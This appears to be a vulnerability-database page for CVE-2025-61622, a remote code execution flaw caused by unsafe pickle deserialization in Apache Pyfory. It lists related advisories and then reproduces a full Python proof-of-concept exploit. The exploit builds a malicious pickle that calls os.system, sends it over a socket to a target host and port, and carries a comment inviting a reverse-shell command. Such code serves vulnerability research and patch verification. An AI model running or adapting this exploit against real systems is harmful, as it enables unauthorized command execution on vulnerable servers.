| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Exploit for CVE-2025-61622 | 3 Oct 202512:44 | โ | githubexploit | |
| CVE-2025-61622 | 29 Sep 202512:21 | โ | circl | |
| Apache Fory ๅฎๅ จๆผๆด | 1 Oct 202500:00 | โ | cnnvd | |
| Apache Fory Deserialization Vulnerability | 9 Oct 202500:00 | โ | cnvd | |
| CVE-2025-61622 | 1 Oct 202509:55 | โ | cve | |
| CVE-2025-61622 Apache Fory, Apache Fory: Python RCE via unguarded pickle fallback serializer in pyfory | 1 Oct 202509:55 | โ | cvelist | |
| Apache Pyfory python is vulnerable to deserialization of untrusted data | 1 Oct 202512:30 | โ | github | |
| CVE-2025-61622 | 1 Oct 202510:15 | โ | nvd | |
| CVE-2025-61622 Apache Fory, Apache Fory: Python RCE via unguarded pickle fallback serializer in pyfory | 1 Oct 202509:55 | โ | osv | |
| GHSA-538V-3WQ9-4H3R Apache Pyfory python is vulnerable to deserialization of untrusted data | 1 Oct 202512:30 | โ | osv |
#!/usr/bin/env python3
"""
===========================================================================
CVE-2025-61622 Proof of Concept (PoC)
Author: SK Rahimul Haque
Contact: [email protected]/https://www.linkedin.com/in/sk-rahimul-haque-51538522a/
Date: 2025-10-03
===========================================================================
Description:
This PoC demonstrates the Remote Code Execution (RCE) vulnerability in
Apache Pyfory (versions 0.12.0-0.12.2 and legacy PyFury 0.1.0-0.10.3)
due to insecure pickle fallback deserialization (CVE-2025-61622).
Disclaimer:
This code is for educational and authorized testing purposes only.
Do not use for unauthorized activities. The author assumes no liability
for misuse or damage caused by this script.
License: MIT License (Optional: Add if applicable)
===========================================================================
"""
import pickle
import socket
import os
import sys
# --- Banner ---
def print_banner():
banner = """
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2025-61622 PoC Exploit โ
โ Author: SK Rahimul Haque โ
โ Educational Use Only - Do Not Misuse โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
"""
print(banner)
# --- Payload Class ---
class RCEPayload:
def __reduce__(self):
# Reverse shell command (adjust IP/port as needed)
cmd = "id"
return (os.system, (cmd,))
# --- Exploit Functions ---
def create_exploit():
"""Generate malicious pickle payload."""
print("[*] Creating malicious payload...")
return pickle.dumps(RCEPayload())
def exploit_target(target_host, target_port):
"""Send payload to vulnerable Pyfory application."""
payload = create_exploit()
try:
print(f"[*] Connecting to {target_host}:{target_port}...")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host, target_port))
print("[+] Connection established.")
print("[*] Sending payload...")
client.send(payload)
print("[+] Payload sent successfully!")
client.close()
except Exception as e:
print(f"[-] Exploit failed: {e}")
# --- Main Execution ---
if __name__ == "__main__":
print_banner()
if len(sys.argv) != 3:
print("Usage: python cve_2025_61622_poc.py <target_host> <target_port>")
print("Example: python cve_2025_61622_poc.py 127.0.0.1 9000")
sys.exit(1)
target_host = sys.argv[1]
target_port = int(sys.argv[2])
exploit_target(target_host, target_port)Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation